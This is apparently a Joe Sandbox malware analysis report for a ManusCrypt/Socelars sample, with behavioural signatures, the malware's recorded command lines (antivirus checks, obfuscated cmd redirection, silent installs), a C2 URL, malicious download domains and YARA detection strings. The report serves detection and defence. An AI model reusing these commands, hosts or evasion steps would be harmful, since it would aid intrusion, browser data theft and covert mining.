Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
l39HA25qjw.exe

Overview

General Information

Sample Name:l39HA25qjw.exe
Analysis ID:715502
MD5:5417b1ca4da061fc9bb034627fbbda40
SHA1:77340a75abaea4f7c215670b76f813222d892a22
SHA256:b92419fed9d1c40328157fd0e937a1c891138590d4857de113c052b3148a0f8f
Infos:

Detection

ManusCrypt, Socelars
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Snort IDS alert for network traffic
Yara detected UAC Bypass using CMSTP
DLL reload attack detected
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected ManusCrypt
Yara detected Socelars
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Found strings related to Crypto-Mining
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Uses known network protocols on non-standard ports
Creates processes via WMI
Machine Learning detection for sample
Drops PE files to the document folder of the user
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Creates a thread in another existing process (thread injection)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Sets a auto configuration URL for Internet Explorer (IE settings are enforced automatically)
Detected VMProtect packer
Drops PE files with a suspicious file extension
Writes to foreign memory regions
Overwrites Mozilla Firefox settings
Installs new ROOT certificates
Renames NTDLL to bypass HIPS
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Obfuscated command line found
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Sets debug register (to hijack the execution of another thread)
Found API chain indicative of sandbox detection
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality to simulate keystroke presses
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to execute programs as a different user
PE file contains sections with non-standard names
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Entry point lies outside standard sections
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Enables driver privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Enables security privileges
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to simulate mouse events
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

  • System is w10x64native
  • l39HA25qjw.exe (PID: 7684 cmdline: C:\Users\user\Desktop\l39HA25qjw.exe MD5: 5417B1CA4DA061FC9BB034627FBBDA40)
    • at.exe (PID: 420 cmdline: at 3874982763784yhwgdfg78234789s42809374918uf MD5: 2AE20048111861FA09B709D3CC551AD6)
      • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1348 cmdline: cmd /c cmd < Virtual.wms & ping -n 5 localhost MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 1244 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • tasklist.exe (PID: 1288 cmdline: tasklist /FI "imagename eq AvastUI.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • find.exe (PID: 6952 cmdline: find /I /N "avastui.exe" MD5: 31D06677CD9ACA84EA2E2E8E3BF22D65)
        • tasklist.exe (PID: 5504 cmdline: tasklist /FI "imagename eq AVGUI.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • find.exe (PID: 7832 cmdline: find /I /N "avgui.exe" MD5: 31D06677CD9ACA84EA2E2E8E3BF22D65)
        • findstr.exe (PID: 7900 cmdline: findstr /V /R "^xAuYKKZEsy$" Similarly.wms MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • Fuck.exe.pif (PID: 2268 cmdline: Fuck.exe.pif h MD5: 6987E4CD3F256462F422326A7EF115B9)
          • Fuck.exe.pif (PID: 6488 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif MD5: 6987E4CD3F256462F422326A7EF115B9)
          • Fuck.exe.pif (PID: 7152 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif MD5: 6987E4CD3F256462F422326A7EF115B9)
            • FagLhQ (PID: 628 cmdline: C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQ -/SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=767 MD5: 19B20FC498D366730C470BACAB083FE7)
              • FagLhQ.tmp (PID: 3436 cmdline: "C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp" /SL5="$5040E,11860388,791040,C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQ" -/SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=767 MD5: 64F68F0B5364A0313EF5C2EDE5FEAC47)
            • WyFBnl (PID: 7960 cmdline: C:\Users\user\AppData\Local\Temp\ZMozrHwlcUivWMjcwg\WyFBnl MD5: 2F8CBF74871165688C040E0C95DCE0F0)
              • WerFault.exe (PID: 4388 cmdline: C:\Windows\system32\WerFault.exe -u -p 7960 -s 272 MD5: 5C06542FED8EE68994D43938E7326D75)
            • MpVMRr (PID: 7940 cmdline: C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRr MD5: 1725996A931F0F5164CB69E713608F1F)
              • conhost.exe (PID: 5604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • EfRhfn (PID: 2776 cmdline: C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfn MD5: 78C42D6817AF1AD96CABDF6FF2F7F3DA)
              • WerFault.exe (PID: 1928 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 856 MD5: 40A149513D721F096DDF50C04DA2F01F)
            • DMLnyt (PID: 3452 cmdline: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt MD5: E3C664A4A00BCBD6BD73D48169421458)
        • PING.EXE (PID: 844 cmdline: ping localhost -n 5 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • PING.EXE (PID: 7148 cmdline: ping -n 5 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)
  • rundll32.exe (PID: 3436 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: EF3179D498793BF4234F708D3BE28633)
    • vc_redist.x64.exe (PID: 1828 cmdline: "C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exe" /install /quiet /norestart MD5: CDCE5D5EE259D8071FA82F522C5C7D6E)
      • vc_redist.x64.exe (PID: 8120 cmdline: "C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exe" -burn.filehandle.attached=636 -burn.filehandle.self=644 /install /quiet /norestart MD5: D940EA062ED6E99F6D873C2F5F09D1C9)
        • VC_redist.x64.exe (PID: 5796 cmdline: "C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{F7864B24-BD58-4321-8DAF-90AD3F7AED80} {2D0A5E22-0BB0-4C91-8FDC-D5C3E4413F94} 8120 MD5: D940EA062ED6E99F6D873C2F5F09D1C9)
  • svchost.exe (PID: 7204 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: F586835082F632DC8D9404D83BC16316)
    • WerFault.exe (PID: 2692 cmdline: C:\Windows\system32\WerFault.exe -pss -s 480 -p 7960 -ip 7960 MD5: 5C06542FED8EE68994D43938E7326D75)
    • WerFault.exe (PID: 6728 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2776 -ip 2776 MD5: 40A149513D721F096DDF50C04DA2F01F)
    • WerFault.exe (PID: 2724 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3452 -ip 3452 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • rundll32.exe (PID: 3352 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7288 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open MD5: 889B99C52A60DD49227C5E485A016679)
      • svchost.exe (PID: 7380 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: F586835082F632DC8D9404D83BC16316)
        • svchost.exe (PID: 1572 cmdline: C:\Windows\system32\svchost.exe -k WspService MD5: F586835082F632DC8D9404D83BC16316)
      • svchost.exe (PID: 2752 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: F586835082F632DC8D9404D83BC16316)
  • VSSVC.exe (PID: 6936 cmdline: C:\Windows\system32\vssvc.exe MD5: AA98234C89499A69BD55C2DCCC4BCCC9)
  • svchost.exe (PID: 8072 cmdline: C:\Windows\System32\svchost.exe -k swprv MD5: F586835082F632DC8D9404D83BC16316)
  • cleanup
{"C2 url": "https://dfgrthres.s3.eu-west-3.amazonaws.com/aysdg930"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exeJoeSecurity_SocelarsYara detected SocelarsJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exeINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
      • 0x147558:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x1475a8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x1464d0:$s1: CoGetObject
      • 0x147414:$s2: Elevation:Administrator!new:
      C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnytJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnytJoeSecurity_SocelarsYara detected SocelarsJoe Security
          Click to see the 1 entries
          SourceRuleDescriptionAuthorStrings
          00000025.00000000.42841967516.0000000000F09000.00000008.00000001.01000000.00000018.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000026.00000003.42895486469.000001980989B000.00000004.00000020.00020000.00000000.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
            • 0x1515a:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
            00000022.00000002.42906398248.0000000003484000.00000040.00001000.00020000.00000000.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
            • 0x10d66:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
            00000022.00000002.42906398248.0000000003484000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_ManusCryptYara detected ManusCryptJoe Security
              00000022.00000002.42906398248.0000000003484000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Generic_a681f24aunknownunknown
              • 0xa4ec:$a: _kasssperskdy
              • 0xb0ae:$c: {SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}
              Click to see the 62 entries
              SourceRuleDescriptionAuthorStrings
              40.2.svchost.exe.1f19b330000.0.unpackSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
              • 0x6506e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
              40.2.svchost.exe.1f19b330000.0.unpackJoeSecurity_ManusCryptYara detected ManusCryptJoe Security
                40.2.svchost.exe.1f19b330000.0.unpackMALWARE_Win_ChebkaDetects ChebkaditekSHen
                • 0x58c08:$s1: -k netsvcs
                • 0x583c8:$s3: Mozilla/4.0 (compatible)
                • 0x576f0:$s4: _kasssperskdy
                • 0x56d88:$s5: winssyslog
                • 0x58950:$s6: LoaderDll%d
                • 0x56c60:$s7: cmd.exe /c rundll32.exe shell32.dll,
                • 0x56890:$s8: cmd.exe /c start chrome.exe
                • 0x569f0:$s8: cmd.exe /c start msedge.exe
                • 0x56bd0:$s8: cmd.exe /c start firefox.exe
                • 0x66ef0:$f1: .?AVCHVncManager@@
                • 0x672d8:$f2: .?AVCNetstatManager@@
                • 0x67348:$f3: .?AVCTcpAgentListener@@
                • 0x671c8:$f4: .?AVIUdpClientListener@@
                • 0x67578:$f5: .?AVCShellManager@@
                • 0x67528:$f6: .?AVCScreenSpy@@
                40.2.svchost.exe.1f19b330000.0.unpackWindows_Trojan_Generic_a681f24aunknownunknown
                • 0x576f0:$a: _kasssperskdy
                • 0x5861e:$c: {SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}
                35.0.svchost.exe.2546f070000.0.unpackSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
                • 0x6506e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
                Click to see the 61 entries
                No Sigma rule has matched
                Timestamp:192.168.11.201.1.1.153457532027757 10/04/22-07:11:10.317756
                SID:2027757
                Source Port:53457
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.11.2034.142.181.18160830532014702 10/04/22-07:10:26.141908
                SID:2014702
                Source Port:60830
                Destination Port:53
                Protocol:UDP
                Classtype:Potential Corporate Privacy Violation

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://2jhbdhjfsdf2.monster/search_hyperfs_213.exeAvira URL Cloud: Label: malware
                Source: http://ngdatas.pw/https://www.icodeps.com/0.0.0.0%d.%d.%d.%dhttp-1ZIPAvira URL Cloud: Label: malware
                Source: http://www.savesucpnys.xyz/mp3studios_6.exeyAvira URL Cloud: Label: phishing
                Source: http://www.savesucpnys.xyz/mp3studios6/mp3studios_6.exeown/u4vYmgIN4sqk0fc498Avira URL Cloud: Label: phishing
                Source: http://www.savesucpnys.xyz/mp3studios6/mp3studios_6.exeAvira URL Cloud: Label: phishing
                Source: http://www.savesucpnys.xyz/mp3studios_6.exeLMEMXAvira URL Cloud: Label: phishing
                Source: http://www.channelinfo.pw/index.php/Home/Index/getExeidnameexe_urlexe_namerun_valuecountry_codeabandAvira URL Cloud: Label: malware
                Source: http://www.savesucpnys.xyz/mAvira URL Cloud: Label: phishing
                Source: http://www.savesucpnys.xyz/2jhbdhjfsdf2.monsterS5Avira URL Cloud: Label: phishing
                Source: C:\Users\user\AppData\Local\Temp\ZMozrHwlcUivWMjcwg\WyFBnlAvira: detection malicious, Label: HEUR/AGEN.1210630
                Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnytAvira: detection malicious, Label: HEUR/AGEN.1213343
                Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnytAvira: detection malicious, Label: JS/SpyBanker.G2
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\pb1105[1].exeAvira: detection malicious, Label: HEUR/AGEN.1210630
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exeAvira: detection malicious, Label: HEUR/AGEN.1213343
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exeAvira: detection malicious, Label: JS/SpyBanker.G2
                Source: l39HA25qjw.exeVirustotal: Detection: 14%Perma Link
                Source: l39HA25qjw.exeReversingLabs: Detection: 20%
                Source: b.dowgmeb.comVirustotal: Detection: 18%Perma Link
                Source: 2jhbdhjfsdf2.monsterVirustotal: Detection: 13%Perma Link
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\fliu[1].exeReversingLabs: Detection: 84%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\fliu[1].exeMetadefender: Detection: 33%Perma Link
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\pb1105[1].exeReversingLabs: Detection: 46%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\setup[1].exeReversingLabs: Detection: 46%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\jame001[1].exeReversingLabs: Detection: 96%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\AdblockInstaller[1].exeReversingLabs: Detection: 30%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exeReversingLabs: Detection: 73%
                Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnytReversingLabs: Detection: 73%
                Source: C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfnReversingLabs: Detection: 96%
                Source: C:\Users\user\AppData\Local\Temp\XbCZmnlWlcNasYtQIR\xfQBIgReversingLabs: Detection: 46%
                Source: C:\Users\user\AppData\Local\Temp\ZMozrHwlcUivWMjcwg\WyFBnlReversingLabs: Detection: 46%
                Source: C:\Users\user\AppData\Local\Temp\db.dllReversingLabs: Detection: 12%
                Source: C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQReversingLabs: Detection: 30%
                Source: C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRrReversingLabs: Detection: 84%
                Source: C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRrMetadefender: Detection: 33%Perma Link
                Source: C:\Users\user\Documents\VlcpVideoV1.0.1\EfRhfn.exeReversingLabs: Detection: 96%
                Source: l39HA25qjw.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\ZMozrHwlcUivWMjcwg\WyFBnlJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnytJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfnJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\jame001[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\pb1105[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exeJoe Sandbox ML: detected
                Source: 37.0.DMLnyt.dc0000.5.unpackAvira: Label: JS/SpyBanker.G2
                Source: 37.0.DMLnyt.dc0000.3.unpackAvira: Label: JS/SpyBanker.G2
                Source: 35.2.svchost.exe.2546f070000.0.unpackAvira: Label: TR/ATRAPS.Gen2
                Source: 20.2.Fuck.exe.pif.2750000.4.unpackAvira: Label: TR/Crypt.XPACK.Gen3
                Source: 37.0.DMLnyt.dc0000.0.unpackAvira: Label: JS/SpyBanker.G2
                Source: 40.2.svchost.exe.1f19b330000.0.unpackAvira: Label: TR/ATRAPS.Gen2
                Source: 35.0.svchost.exe.2546f070000.0.unpackAvira: Label: TR/ATRAPS.Gen2
                Source: 37.2.DMLnyt.dc0000.0.unpackAvira: Label: JS/SpyBanker.G2
                Source: 38.2.svchost.exe.19809ad0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
                Source: 37.0.DMLnyt.dc0000.4.unpackAvira: Label: JS/SpyBanker.G2
                Source: 37.0.DMLnyt.dc0000.2.unpackAvira: Label: JS/SpyBanker.G2
                Source: 40.0.svchost.exe.1f19b330000.0.unpackAvira: Label: TR/ATRAPS.Gen2
                Source: 34.2.rundll32.exe.3440000.0.unpackAvira: Label: TR/ATRAPS.Gen2
                Source: 37.0.DMLnyt.dc0000.1.unpackAvira: Label: JS/SpyBanker.G2
                Source: 37.0.DMLnyt.dc0000.5.unpackMalware Configuration Extractor: Socelars {"C2 url": "https://dfgrthres.s3.eu-west-3.amazonaws.com/aysdg930"}
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_00402F10 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00402F10

                Exploits

                barindex
                Source: Yara matchFile source: 37.0.DMLnyt.dc0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.0.DMLnyt.dc0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.0.DMLnyt.dc0000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.2.DMLnyt.dc0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.0.DMLnyt.dc0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.0.DMLnyt.dc0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.0.DMLnyt.dc0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000025.00000000.42841967516.0000000000F09000.00000008.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.42853416097.0000000000F09000.00000008.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.42849786180.0000000000F09000.00000008.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.42892250297.0000000000F09000.00000004.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.42915184542.0000000000F09000.00000004.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.42884223842.0000000000F09000.00000004.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.42845813471.0000000000F09000.00000008.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Fuck.exe.pif PID: 7152, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exe, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt, type: DROPPED

                Bitcoin Miner

                barindex
                Source: FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: jsecoin.com
                Source: FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ??0xmrMiner@@QEAA@_K_N@Z
                Source: FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: coinhive.com

                Compliance

                barindex
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifUnpacked PE file: 20.2.Fuck.exe.pif.2750000.4.unpack
                Source: l39HA25qjw.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1028\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1029\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1031\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1036\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1040\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1041\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1042\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1045\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1046\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1049\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1055\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\2052\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\3082\license.rtf
                Source: unknownHTTPS traffic detected: 172.67.68.80:443 -> 192.168.11.20:49835 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.25.158:443 -> 192.168.11.20:49837 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.32.99.56:443 -> 192.168.11.20:49838 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.79.157.152:443 -> 192.168.11.20:49839 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.11.20:49841 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.11.20:49842 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.72.236.239:443 -> 192.168.11.20:49847 version: TLS 1.2
